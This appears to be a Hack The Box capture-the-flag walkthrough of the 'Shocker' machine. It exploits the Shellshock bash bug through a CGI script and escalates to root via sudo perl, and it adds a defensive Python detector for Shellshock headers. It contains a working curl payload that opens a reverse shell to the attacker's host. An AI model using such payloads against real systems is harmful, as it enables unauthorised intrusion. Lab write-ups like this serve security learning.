Shocker — HTB Walkthrough
Shellshock Vulnerability (from the wiki): Known as the “Bash Bug” or “ShellShock,” the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271) could allow an attacker to gain control over a targeted computer if exploited successfully. The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix.
ENUMERATION
Visiting the website (port 80 HTTP enumeration) we see:
I did all kinds of fuzzing and gobuster scans, but everything showed a 4xx code. Every wordlist I used for the gobuster scan showed cgi-bin, but it could not recurse into it because it returned a 4xx error. But this could be interesting after all.
So I ran a gobuster scan against http://10.10.10.56/cgi-bin/
I know this is guesswork because cgi-bin was giving 4xx, but after I had done everything else, including UDP port enumeration and using shocker.py from GitHub, this needed to be checked for sure.
You can use curl to send the request:
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.14/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh
I made use of shocker.py from GitHub to execute commands.
I opened netcat on my machine on port 1234 and tried executing the reverse shell command.
On my machine I see it gives an error: bash not found. This means this user has no access to bash. Let's try a python reverse shell.
So finally I did this:
Again, since python wasn't there, we could not spawn a shell using python. So first I collected the user.txt flag by going to the home directory of shelly, and then I ran /bin/bash -i (interactive bash) to spawn the shell.
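As an added defensive example (not code from the original walkthrough or from shocker.py), the following Python flags HTTP requests whose header values begin with the bash function-definition marker that the Shellshock request above relies on. The sample requests are constructed, and the assumption is that the web server copies client headers such as Cookie and User-Agent into the CGI handler's environment.

```python
import re

# Shellshock (CVE-2014-6271) is triggered when bash imports an environment
# variable whose value starts with a function definition "() {" followed by a
# body and then a trailing command. A CGI server exports client headers into
# the handler's environment, so a request header is the carrier. Vulnerable
# bash required the value to begin exactly with "() {"; the regex tolerates
# extra whitespace so probes from scanners that vary spacing are still flagged.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def is_shellshock_probe(value: str) -> bool:
    """True if a header value begins with the bash function-definition marker."""
    return SHELLSHOCK_RE.match(value.lstrip()) is not None


def find_shellshock_headers(raw_request: str) -> list:
    """Parse a raw HTTP request (request line plus headers) and return the
    names of headers whose values carry the Shellshock marker."""
    sep = "\r\n" if "\r\n" in raw_request else "\n"
    hits = []
    for line in raw_request.split(sep)[1:]:  # skip the request line
        if not line.strip():
            break  # blank line ends the header block
        name, colon, value = line.partition(":")
        if colon and is_shellshock_probe(value):
            hits.append(name.strip())
    return hits


# Constructed sample requests (not captured traffic): benign, marker in Cookie
# as in the walkthrough's curl command, and marker in User-Agent with odd spacing.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/user.sh HTTP/1.1\r\nHost: 10.10.10.56\r\n"
    "User-Agent: curl/7.68.0\r\nCookie: sessionid=abc123\r\n\r\n",
    "GET /cgi-bin/user.sh HTTP/1.1\r\nHost: 10.10.10.56\r\n"
    "Cookie: () { :;}; echo PROBE\r\n\r\n",
    "GET /cgi-bin/user.sh HTTP/1.1\r\nHost: 10.10.10.56\r\n"
    "User-Agent: ( ) { :; }; echo PROBE\r\n\r\n",
]


def scan_requests(requests: list) -> list:
    """Return (request line, flagged header names) for every request."""
    return [(req.split("\n", 1)[0].strip(), find_shellshock_headers(req))
            for req in requests]


if __name__ == "__main__":
    for request_line, flagged in scan_requests(SAMPLE_REQUESTS):
        print(request_line, "->", flagged or "clean")
```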
PRIVILEGE ESCALATION
Running sudo -l shows that shelly can execute perl as root.
Great, we will exploit it using the native binary; open GTFOBins to make it easier and look at the sudo perl entry to spawn a shell.
ROOTED !!!